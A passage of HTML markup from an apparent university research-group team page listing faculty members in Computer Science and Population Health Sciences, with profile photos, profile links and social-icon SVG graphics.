29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 